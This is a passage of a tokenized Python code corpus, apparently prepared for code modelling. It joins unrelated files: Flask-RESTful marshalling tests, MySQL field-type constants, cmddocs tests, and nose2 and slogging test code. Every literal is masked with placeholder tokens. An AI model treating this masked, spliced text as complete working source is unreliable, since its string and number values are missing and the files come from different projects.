'<STR_LIT>' ) <EOL> ] ) ) <EOL> ] ) ] <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_list ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . List ( fields . String ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_list_of_nesteds ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . List ( fields . Nested ( { <EOL> '<STR_LIT>' : fields . String <EOL> } ) ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , [ OrderedDict ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ] ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_list_of_lists ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT>' , fields . List ( fields . List ( <EOL> fields . String ) ) ) <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , ( '<STR_LIT>' , [ [ '<STR_LIT>' ] , [ '<STR_LIT>' ] ] ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_marshal_nested_dict ( self ) : <EOL> model = OrderedDict ( [ <EOL> ( '<STR_LIT:foo>' , fields . Raw ) , <EOL> ( '<STR_LIT:bar>' , OrderedDict ( [ <EOL> ( '<STR_LIT:a>' , fields . Raw ) , <EOL> ( '<STR_LIT:b>' , fields . Raw ) , <EOL> ] ) ) , <EOL> ] ) <EOL> marshal_fields = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:bar>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:b>' , <NUM_LIT:2> ) , ( '<STR_LIT:c>' , <NUM_LIT:3> ) ] ) <EOL> output = marshal ( marshal_fields , model ) <EOL> expected = OrderedDict ( [ ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:bar>' , OrderedDict ( [ ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:b>' , <NUM_LIT:2> ) ] ) ) ] ) <EOL> self . assertEquals ( output , expected ) <EOL> def test_will_prettyprint_json_in_debug_mode ( self ) : <EOL> self . app . config [ '<STR_LIT>' ] = True <EOL> api = Api ( self . app ) <EOL> class Foo1 ( Resource ) : <EOL> def get ( self ) : <EOL> return { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> api . add_resource ( Foo1 , '<STR_LIT>' , endpoint = '<STR_LIT:bar>' ) <EOL> with self . app . test_client ( ) as client : <EOL> foo = client . get ( '<STR_LIT>' ) <EOL> lines = foo . data . splitlines ( ) <EOL> lines = [ line . decode ( ) for line in lines ] <EOL> self . assertEquals ( "<STR_LIT:{>" , lines [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( lines [ <NUM_LIT:1> ] . startswith ( '<STR_LIT:U+0020>' ) ) <EOL> self . assertTrue ( lines [ <NUM_LIT:2> ] . startswith ( '<STR_LIT:U+0020>' ) ) <EOL> self . assertEquals ( "<STR_LIT:}>" , lines [ <NUM_LIT:3> ] ) <EOL> self . assertTrue ( foo . data . endswith ( b'<STR_LIT:\n>' ) ) <EOL> def test_json_float_marshalled ( self ) : <EOL> api = Api ( self . app ) <EOL> class FooResource ( Resource ) : <EOL> fields = { '<STR_LIT:foo>' : fields . Float } <EOL> def get ( self ) : <EOL> return marshal ( { "<STR_LIT:foo>" : <NUM_LIT> } , self . fields ) <EOL> api . add_resource ( FooResource , '<STR_LIT>' ) <EOL> app = self . app . test_client ( ) <EOL> resp = app . get ( '<STR_LIT>' ) <EOL> self . assertEquals ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEquals ( resp . data . decode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) </s>
<s> DECIMAL = <NUM_LIT:0> <EOL> TINY = <NUM_LIT:1> <EOL> SHORT = <NUM_LIT:2> <EOL> LONG = <NUM_LIT:3> <EOL> FLOAT = <NUM_LIT:4> <EOL> DOUBLE = <NUM_LIT:5> <EOL> NULL = <NUM_LIT:6> <EOL> TIMESTAMP = <NUM_LIT:7> <EOL> LONGLONG = <NUM_LIT:8> <EOL> INT24 = <NUM_LIT:9> <EOL> DATE = <NUM_LIT:10> <EOL> TIME = <NUM_LIT:11> <EOL> DATETIME = <NUM_LIT:12> <EOL> YEAR = <NUM_LIT> <EOL> NEWDATE = <NUM_LIT> <EOL> VARCHAR = <NUM_LIT:15> <EOL> BIT = <NUM_LIT:16> <EOL> TIMESTAMP2 = <NUM_LIT> <EOL> DATETIME2 = <NUM_LIT> <EOL> TIME2 = <NUM_LIT> <EOL> NEWDECIMAL = <NUM_LIT> <EOL> ENUM = <NUM_LIT> <EOL> SET = <NUM_LIT> <EOL> TINY_BLOB = <NUM_LIT> <EOL> MEDIUM_BLOB = <NUM_LIT> <EOL> LONG_BLOB = <NUM_LIT> <EOL> BLOB = <NUM_LIT> <EOL> VAR_STRING = <NUM_LIT> <EOL> STRING = <NUM_LIT> <EOL> GEOMETRY = <NUM_LIT:255> <EOL> CHAR = TINY <EOL> INTERVAL = ENUM </s>
<s> from cmddocs import Cmddocs <EOL> def test_do_delete_edit ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_edit ( "<STR_LIT>" , test = True ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert out . startswith ( "<STR_LIT>" ) <EOL> def test_do_delete_edit_commitmsg ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_log ( "<STR_LIT>" ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert "<STR_LIT>" in out <EOL> def test_do_delete ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_delete ( "<STR_LIT>" ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert out == "<STR_LIT>" <EOL> def test_do_delete_log_commitmsg ( demoenv , capsys ) : <EOL> c , d = demoenv <EOL> Cmddocs ( c ) . do_log ( "<STR_LIT>" ) <EOL> out , err = capsys . readouterr ( ) <EOL> assert "<STR_LIT>" in out </s>
<s> import logging <EOL> import os <EOL> import sys <EOL> from nose2 . compat import unittest <EOL> from nose2 import events , loader , runner , session , util <EOL> log = logging . getLogger ( __name__ ) <EOL> __unittest = True <EOL> class PluggableTestProgram ( unittest . TestProgram ) : <EOL> """<STR_LIT>""" <EOL> sessionClass = session . Session <EOL> _currentSession = None <EOL> loaderClass = loader . PluggableTestLoader <EOL> runnerClass = runner . PluggableTestRunner <EOL> defaultPlugins = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> excludePlugins = ( ) <EOL> def __init__ ( self , ** kw ) : <EOL> plugins = kw . pop ( '<STR_LIT>' , [ ] ) <EOL> exclude = kw . pop ( '<STR_LIT>' , [ ] ) <EOL> hooks = kw . pop ( '<STR_LIT>' , [ ] ) <EOL> self . defaultPlugins = list ( self . defaultPlugins ) <EOL> self . excludePlugins = list ( self . excludePlugins ) <EOL> self . extraHooks = hooks <EOL> self . defaultPlugins . extend ( plugins ) <EOL> self . excludePlugins . extend ( exclude ) <EOL> super ( PluggableTestProgram , self ) . __init__ ( ** kw ) <EOL> def parseArgs ( self , argv ) : <EOL> """<STR_LIT>""" <EOL> self . session = self . sessionClass ( ) <EOL> self . __class__ . _currentSession = self . session <EOL> self . argparse = self . session . argparse <EOL> self . testLoader = self . loaderClass ( self . session ) <EOL> self . session . testLoader = self . testLoader <EOL> self . setInitialArguments ( ) <EOL> cfg_args , argv = self . argparse . parse_known_args ( argv [ <NUM_LIT:1> : ] ) <EOL> self . handleCfgArgs ( cfg_args ) <EOL> self . argparse . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:*>' ) <EOL> self . argparse . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' ) ) <EOL> args , argv = self . argparse . parse_known_args ( argv ) <EOL> if argv : <EOL> self . argparse . error ( "<STR_LIT>" % '<STR_LIT:U+0020>' . join ( argv ) ) <EOL> self . handleArgs ( args ) <EOL> self . createTests ( ) <EOL> def setInitialArguments ( self ) : <EOL> """<STR_LIT>""" <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , default = None , <EOL> help = "<STR_LIT>" ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT:-c>' , nargs = '<STR_LIT:?>' , action = '<STR_LIT>' , <EOL> default = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , const = False , default = True , <EOL> help = "<STR_LIT>" ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , const = False , default = True , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = "<STR_LIT>" ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = [ ] , <EOL> help = "<STR_LIT>" ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:count>' , default = <NUM_LIT:0> , help = "<STR_LIT>" ) <EOL> self . argparse . add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , const = <NUM_LIT:0> ) <EOL> self . argparse . add_argument ( <EOL> '<STR_LIT>' , default = logging . WARN , <EOL> help = '<STR_LIT>' ) <EOL> def handleCfgArgs ( self , cfg_args ) : <EOL> """<STR_LIT>""" <EOL> self . session . logLevel = util . parse_log_level ( cfg_args . log_level ) <EOL> logging . basicConfig ( level = self . session . logLevel ) <EOL> log . debug ( '<STR_LIT>' , cfg_args . log_level ) <EOL> if cfg_args . verbose : <EOL> self . session . verbosity += cfg_args . verbose <EOL> self . session . startDir = cfg_args . start_dir <EOL> if cfg_args . top_level_directory : <EOL> self . session . topLevelDir = cfg_args . top_level_directory <EOL> self . session . loadConfigFiles ( * self . findConfigFiles ( cfg_args ) ) <EOL> self . session . setStartDir ( ) <EOL> self . session . prepareSysPath ( ) <EOL> if cfg_args . load_plugins : <EOL> self . defaultPlugins . extend ( cfg_args . plugins ) <EOL> self . excludePlugins . extend ( cfg_args . exclude_plugins ) <EOL> self . loadPlugins ( ) <EOL> elif cfg_args . plugins or cfg_args . exclude_plugins : <EOL> log . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def findConfigFiles ( self , cfg_args ) : <EOL> """<STR_LIT>""" <EOL> filenames = cfg_args . config [ : ] <EOL> proj_opts = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for fn in proj_opts : <EOL> if cfg_args . top_level_directory : <EOL> fn = os . path . abspath ( <EOL> os . path . join ( cfg_args . top_level_directory , fn ) ) <EOL> filenames . append ( fn ) <EOL> if cfg_args . user_config : <EOL> user_opts = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for fn in user_opts : <EOL> filenames . append ( os . path . expanduser ( fn ) ) <EOL> return filenames <EOL> def handleArgs ( self , args ) : <EOL> """<STR_LIT>""" <EOL> self . testNames = args . testNames <EOL> self . session . hooks . handleArgs ( events . CommandLineArgsEvent ( args = args ) ) <EOL> def loadPlugins ( self ) : <EOL> """<STR_LIT>""" <EOL> self . session . loadPlugins ( self . defaultPlugins , self . excludePlugins ) <EOL> for method_name , plugin in self . extraHooks : <EOL> self . session . hooks . register ( method_name , plugin ) <EOL> def createTests ( self ) : <EOL> """<STR_LIT>""" <EOL> event = events . CreateTestsEvent ( <EOL> self . testLoader , self . testNames , self . module ) <EOL> result = self . session . hooks . createTests ( event ) <EOL> if event . handled : <EOL> test = result <EOL> else : <EOL> log . debug ( "<STR_LIT>" , self . testNames , self . module ) <EOL> test = self . testLoader . loadTestsFromNames ( <EOL> self . testNames , self . module ) <EOL> event = events . CreatedTestSuiteEvent ( test ) <EOL> result = self . session . hooks . createdTestSuite ( event ) <EOL> if event . handled : <EOL> test = result <EOL> self . test = test <EOL> def runTests ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = self . _makeRunner ( ) <EOL> try : <EOL> self . result = runner . run ( self . test ) <EOL> except Exception as e : <EOL> log . exception ( '<STR_LIT>' ) <EOL> sys . stderr . write ( '<STR_LIT>' % ( e ) ) <EOL> if self . exit : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if self . exit : <EOL> sys . exit ( not self . result . wasSuccessful ( ) ) <EOL> def _makeRunner ( self ) : <EOL> runner = self . runnerClass ( self . session ) <EOL> event = events . RunnerCreatedEvent ( runner ) <EOL> self . session . hooks . runnerCreated ( event ) <EOL> self . session . testRunner = event . runner <EOL> return event . runner <EOL> @ classmethod <EOL> def getCurrentSession ( cls ) : <EOL> """<STR_LIT>""" <EOL> return cls . _currentSession <EOL> main = PluggableTestProgram <EOL> def discover ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs [ '<STR_LIT>' ] = None <EOL> return main ( * args , ** kwargs ) </s>
<s> import logging <EOL> import os <EOL> import argparse <EOL> from six . moves import configparser <EOL> from nose2 import config , events , util <EOL> log = logging . getLogger ( __name__ ) <EOL> __unittest = True <EOL> class Session ( object ) : <EOL> """<STR_LIT>""" <EOL> configClass = config . Config <EOL> def __init__ ( self ) : <EOL> self . argparse = argparse . ArgumentParser ( prog = '<STR_LIT>' , add_help = False ) <EOL> self . pluginargs = self . argparse . add_argument_group ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . config = configparser . ConfigParser ( ) <EOL> self . hooks = events . PluginInterface ( ) <EOL> self . plugins = [ ] <EOL> self . verbosity = <NUM_LIT:1> <EOL> self . startDir = None <EOL> self . topLevelDir = None <EOL> self . testResult = None <EOL> self . testLoader = None <EOL> self . logLevel = logging . WARN <EOL> def get ( self , section ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> if self . config . has_section ( section ) : <EOL> items = self . config . items ( section ) <EOL> return self . configClass ( items ) <EOL> def loadConfigFiles ( self , * filenames ) : <EOL> """<STR_LIT>""" <EOL> self . config . read ( filenames ) <EOL> def loadPlugins ( self , modules = None , exclude = None ) : <EOL> """<STR_LIT>""" <EOL> if modules is None : <EOL> modules = [ ] <EOL> if exclude is None : <EOL> exclude = [ ] <EOL> cfg = self . unittest <EOL> more_plugins = cfg . as_list ( '<STR_LIT>' , [ ] ) <EOL> cfg_exclude = cfg . as_list ( '<STR_LIT>' , [ ] ) <EOL> exclude . extend ( cfg_exclude ) <EOL> exclude = set ( exclude ) <EOL> all_ = ( set ( modules ) | set ( more_plugins ) ) - exclude <EOL> log . debug ( "<STR_LIT>" , all_ ) <EOL> for module in all_ : <EOL> self . loadPluginsFromModule ( util . module_from_name ( module ) ) <EOL> self . hooks . pluginsLoaded ( events . PluginsLoadedEvent ( self . plugins ) ) <EOL> def loadPluginsFromModule ( self , module ) : <EOL> """<STR_LIT>""" <EOL> avail = [ ] <EOL> for entry in dir ( module ) : <EOL> try : <EOL> item = getattr ( module , entry ) <EOL> except AttributeError : <EOL> pass <EOL> try : <EOL> if issubclass ( item , events . Plugin ) : <EOL> avail . append ( item ) <EOL> except TypeError : <EOL> pass <EOL> for cls in avail : <EOL> log . debug ( "<STR_LIT>" , cls ) <EOL> plugin = cls ( session = self ) <EOL> self . plugins . append ( plugin ) <EOL> for method in self . hooks . preRegistrationMethods : <EOL> if hasattr ( plugin , method ) : <EOL> self . hooks . register ( method , plugin ) <EOL> def registerPlugin ( self , plugin ) : <EOL> """<STR_LIT>""" <EOL> log . debug ( "<STR_LIT>" , plugin ) <EOL> if plugin not in self . plugins : <EOL> self . plugins . append ( plugin ) <EOL> for method in self . hooks . methods : <EOL> if hasattr ( plugin , method ) : <EOL> log . debug ( "<STR_LIT>" , method , plugin ) <EOL> self . hooks . register ( method , plugin ) <EOL> def setStartDir ( self ) : <EOL> if self . startDir is None : <EOL> self . startDir = self . unittest . as_str ( '<STR_LIT>' , '<STR_LIT:.>' ) <EOL> def prepareSysPath ( self ) : <EOL> """<STR_LIT>""" <EOL> tld = self . topLevelDir <EOL> sd = self . startDir <EOL> if tld is None : <EOL> tld = sd <EOL> tld = os . path . abspath ( tld ) <EOL> util . ensure_importable ( tld ) <EOL> for libdir in self . libDirs : <EOL> libdir = os . path . abspath ( os . path . join ( tld , libdir ) ) <EOL> if os . path . exists ( libdir ) : <EOL> util . ensure_importable ( libdir ) <EOL> @ property <EOL> def libDirs ( self ) : <EOL> return self . unittest . as_list ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT:src>' ] ) <EOL> @ property <EOL> def testFilePattern ( self ) : <EOL> return self . unittest . as_str ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ property <EOL> def testMethodPrefix ( self ) : <EOL> return self . unittest . as_str ( '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> @ property <EOL> def unittest ( self ) : <EOL> return self . get ( '<STR_LIT>' ) <EOL> def isPluginLoaded ( self , pluginName ) : <EOL> """<STR_LIT>""" <EOL> for plugin in self . plugins : <EOL> if pluginName == plugin . __class__ . __module__ : <EOL> return True <EOL> return False </s>
<s> from nose2 . compat import unittest <EOL> class Layer ( object ) : <EOL> description = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUp ( cls ) : <EOL> cls . value = <NUM_LIT:1> <EOL> class Test ( unittest . TestCase ) : <EOL> layer = Layer <EOL> def test_ok ( self ) : <EOL> self . assertEqual ( self . layer . value , <NUM_LIT:1> ) <EOL> def test_fail ( self ) : <EOL> self . assertEqual ( self . layer . value , <NUM_LIT:2> ) <EOL> def test_err ( self ) : <EOL> self . assertEqual ( self . layer . mulch , '<STR_LIT>' ) </s>
<s> class Test ( object ) : <EOL> def test ( self ) : <EOL> pass <EOL> def test_gen ( self ) : <EOL> def check ( a ) : <EOL> pass <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:5> ) : <EOL> yield check , i <EOL> def test_params ( self , a ) : <EOL> pass <EOL> test_params . paramList = ( <NUM_LIT:1> , <NUM_LIT:2> ) </s>
<s> import re <EOL> from nose2 . tests . _common import FunctionalTestCase <EOL> class TestPrintHooksPlugin ( FunctionalTestCase ) : <EOL> def test_invocation_by_double_dash_option ( self ) : <EOL> proc = self . runIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> match = re . compile ( "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTestRunOutputMatches ( proc , stderr = match ) <EOL> self . assertEqual ( proc . poll ( ) , <NUM_LIT:0> ) <EOL> def test_invocation_by_single_dash_option ( self ) : <EOL> proc = self . runIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> match = re . compile ( "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTestRunOutputMatches ( proc , stderr = match ) <EOL> self . assertEqual ( proc . poll ( ) , <NUM_LIT:0> ) <EOL> def test_nested_hooks_are_indented ( self ) : <EOL> proc = self . runIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> match = re . compile ( "<STR_LIT>" ) <EOL> self . assertTestRunOutputMatches ( proc , stderr = match ) <EOL> self . assertEqual ( proc . poll ( ) , <NUM_LIT:0> ) </s>
<s> from nose2 . tests . _common import TestCase <EOL> from nose2 . plugins . loader . testcases import TestCaseLoader <EOL> from nose2 import events , loader , session <EOL> class TestTestCaseLoader ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . session = session . Session ( ) <EOL> self . loader = loader . PluggableTestLoader ( session = self . session ) <EOL> self . plugin = TestCaseLoader ( session = self . session ) <EOL> class Mod ( object ) : <EOL> pass <EOL> self . module = Mod ( ) <EOL> class A ( TestCase ) : <EOL> def test ( self ) : <EOL> pass <EOL> class B ( TestCase ) : <EOL> def runTest ( self ) : <EOL> pass <EOL> class C ( TestCase ) : <EOL> def foo ( self ) : <EOL> pass <EOL> class Test ( object ) : <EOL> def test ( self ) : <EOL> pass <EOL> self . module . A = A <EOL> self . module . B = B <EOL> self . module . C = C <EOL> self . module . Test = Test <EOL> def test_can_find_testcases_in_module ( self ) : <EOL> event = events . LoadFromModuleEvent ( self . loader , self . module ) <EOL> result = self . session . hooks . loadTestsFromModule ( event ) <EOL> self . assertEqual ( result , None ) <EOL> self . assertEqual ( len ( event . extraTests ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:0> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:1> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:2> ] . _tests ) , <NUM_LIT:0> ) <EOL> def test_get_testcase_names_can_override_name_selection ( self ) : <EOL> class FooIsOnlyTest ( events . Plugin ) : <EOL> def getTestCaseNames ( self , event ) : <EOL> event . handled = True <EOL> return [ '<STR_LIT:foo>' ] if '<STR_LIT:foo>' in dir ( event . testCase ) else [ ] <EOL> foo = FooIsOnlyTest ( session = self . session ) <EOL> foo . register ( ) <EOL> event = events . LoadFromModuleEvent ( self . loader , self . module ) <EOL> result = self . session . hooks . loadTestsFromModule ( event ) <EOL> self . assertEqual ( result , None ) <EOL> self . assertEqual ( len ( event . extraTests ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:0> ] . _tests ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:1> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:2> ] . _tests ) , <NUM_LIT:1> ) <EOL> def test_plugins_can_exclude_test_names ( self ) : <EOL> class Excluder ( events . Plugin ) : <EOL> def getTestCaseNames ( self , event ) : <EOL> event . excludedNames . append ( '<STR_LIT:test>' ) <EOL> excl = Excluder ( session = self . session ) <EOL> excl . register ( ) <EOL> event = events . LoadFromModuleEvent ( self . loader , self . module ) <EOL> result = self . session . hooks . loadTestsFromModule ( event ) <EOL> self . assertEqual ( result , None ) <EOL> self . assertEqual ( len ( event . extraTests ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:0> ] . _tests ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:1> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:2> ] . _tests ) , <NUM_LIT:0> ) </s>
<s> import unittest <EOL> from slogging import access_processor <EOL> class TestAccessProcessor ( unittest . TestCase ) : <EOL> def test_CIDR_works ( self ) : <EOL> if access_processor . CIDR_support : <EOL> p = access_processor . AccessLogProcessor ( { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> self . assertTrue ( '<STR_LIT>' in p . lb_private_ips ) <EOL> self . assertTrue ( '<STR_LIT:127.0.0.1>' in p . lb_private_ips ) <EOL> self . assertFalse ( '<STR_LIT>' in p . lb_private_ips ) <EOL> else : <EOL> from nose import SkipTest <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> def test_CIDR_process_logs_with_missing_ip ( self ) : <EOL> if access_processor . CIDR_support : <EOL> p = access_processor . AccessLogProcessor ( { '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> line = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> stream = [ line ] <EOL> res = p . process ( stream , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( res . keys ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:a>' ) <EOL> else : <EOL> from nose import SkipTest <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> def test_log_line_parser_query_args ( self ) : <EOL> p = access_processor . AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> query = '<STR_LIT:foo>' <EOL> for param in access_processor . LISTING_PARAMS : <EOL> query += '<STR_LIT>' % param <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' % query <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> expected = { '<STR_LIT:code>' : <NUM_LIT:8> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:object_name>' : '<STR_LIT:o>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : '<STR_LIT:c>' , '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:12> , '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : None } <EOL> for param in access_processor . LISTING_PARAMS : <EOL> expected [ param ] = <NUM_LIT:1> <EOL> expected [ '<STR_LIT>' ] = query <EOL> self . assertEquals ( res , expected ) <EOL> def test_log_line_parser_query_args_with_slash_delimiter_to_container ( self ) : <EOL> p = access_processor . AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> query = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' % query <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> self . assertEquals ( res [ '<STR_LIT:object_name>' ] , None ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT:c>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT:a>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , query ) <EOL> def test_log_line_parser_query_args_with_slash_delimiter_to_account ( self ) : <EOL> p = access_processor . AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ 